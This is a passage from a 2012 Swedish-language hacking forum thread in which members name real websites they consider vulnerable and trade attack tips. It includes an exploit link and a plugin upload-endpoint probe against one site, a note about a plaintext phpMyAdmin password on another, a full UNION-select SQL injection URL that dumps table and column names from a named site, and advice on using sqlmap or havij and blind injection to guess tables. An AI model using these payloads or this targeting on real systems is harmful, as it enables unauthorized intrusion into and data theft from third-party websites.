2012-06-24, 14:34
  #3781
Medlem
MelvinFrohikes avatar
cirkusscott.se

http://1337day.com/exploits/18786
Citera
2012-06-24, 19:39
  #3782
Medlem
Citat:
Ursprungligen postat av MelvinFrohike
cirkusscott.se

http://1337day.com/exploits/18786

Har du testat den där?
Jag får då inte det att fungera.
Citera
2012-06-24, 20:27
  #3783
Medlem
FuckThePolices avatar
Citat:
Ursprungligen postat av FinHackerz
Har du testat den där?
Jag får då inte det att fungera.

Det fungerar ikke för mig heller.
Citera
2012-06-24, 21:00
  #3784
Medlem
Citat:
Ursprungligen postat av MelvinFrohike
cirkusscott.se

http://1337day.com/exploits/18786


Kod:
http://cirkusscott.se/wp-content/plugins/flipbook/php.php

Citat:
{"error":"Server error. Upload directory isn't writable."}
Citera
2012-06-25, 11:36
  #3785
Medlem
Kod:
http://635csi.wastegate.se/index.php?id=610
lösen till phpmyadmin i klartext i databasen.
Citera
2012-07-01, 20:43
  #3786
Avslutad
http://gud.us/toplist.php?list=0&hl=sv ?
Är inte så insatt ^^
Citera
2012-07-01, 21:49
  #3787
Medlem
iKnugens avatar
Om inte information.schema finns, hur gör man för att få fram tables då?
Ska man sitta och gissa allt?
Kod:
http://cetonline.org/Events/events.php?id=85%20union%20select%201,2,3,4,5,6,concat(table_name,0x3a,column_name),8,9,10,11,12,13%  20from%20information_schema.columns%20where%20table_schema=database()--

Hehe, så fort man lägger till UNION så får man 403
Kod:
http://www.animalencounter.org/en/main.php?view=get_subcategory&idcat=18&idsubcat=39
__________________
Senast redigerad av iKnugen 2012-07-01 kl. 22:16.
Citera
2012-07-02, 12:45
  #3788
Medlem
fueones avatar
Citat:
Ursprungligen postat av iKnugen
Om inte information.schema finns, hur gör man för att få fram tables då?
Ska man sitta och gissa allt?
Kod:
http://cetonline.org/Events/events.php?id=85%20union%20select%201,2,3,4,5,6,concat(table_name,0x3a,column_name),8,9,10,11,12,13%  20from%20information_schema.columns%20where%20table_schema=database()--

Hehe, så fort man lägger till UNION så får man 403
Kod:
http://www.animalencounter.org/en/main.php?view=get_subcategory&idcat=18&idsubcat=39

Från vad jag har lärt mig så får du gissa tables, ja.
Citera
2012-07-02, 20:47
  #3789
Medlem
kiluss avatar
Citat:
Ursprungligen postat av iKnugen
Om inte information.schema finns, hur gör man för att få fram tables då?
Ska man sitta och gissa allt?
Blind ska väl fungera ibland.

Ifall du måste gissa, låt något program såsom sqlmap göra det åt dig istället, går bra mycket snabbare och du slipper komma på olika namn på tables.
Glöm dock inte bort att använda huvudet bara för du låter ett program göra jobbet åt dig, heter t.ex databasen hju_base1 är det stor risk att tabellerna börjar med hju_

Lycka till!
Citera
2012-07-03, 00:33
  #3790
Medlem
ant's avatar
Citat:
Ursprungligen postat av kilus
Blind ska väl fungera ibland.

Ifall du måste gissa, låt något program såsom sqlmap göra det åt dig istället, går bra mycket snabbare och du slipper komma på olika namn på tables.
Glöm dock inte bort att använda huvudet bara för du låter ett program göra jobbet åt dig, heter t.ex databasen hju_base1 är det stor risk att tabellerna börjar med hju_

Lycka till!
Om inte information_schema finns (t.ex. om databasen kör MySQL 4) så går det inte att hämta data därifrån på något sätt, spelar ingen roll om du använder dig av blind eller union eller error based. Man är man tvungen att gissa.
Citera
2012-07-03, 07:34
  #3791
Medlem
kiluss avatar
Citat:
Ursprungligen postat av ant'
Om inte information_schema finns (t.ex. om databasen kör MySQL 4) så går det inte att hämta data därifrån på något sätt, spelar ingen roll om du använder dig av blind eller union eller error based. Man är man tvungen att gissa.
Okej, tack!
Kände att jag inte hade jättebra koll i ämnet, blivet för lat med sqlmap och havij...
Citera
2012-07-05, 20:54
  #3792
Medlem
.Chloes avatar
Har kontaktat Comviq men inte fått svar på cirka en vecka.


Läs mer: https://nealpoole.com/blog/
Citera

Skapa ett konto eller logga in för att kommentera

Du måste vara medlem för att kunna kommentera

Skapa ett konto

Det är enkelt att registrera ett nytt konto

Bli medlem

Logga in

Har du redan ett konto? Logga in här

Logga in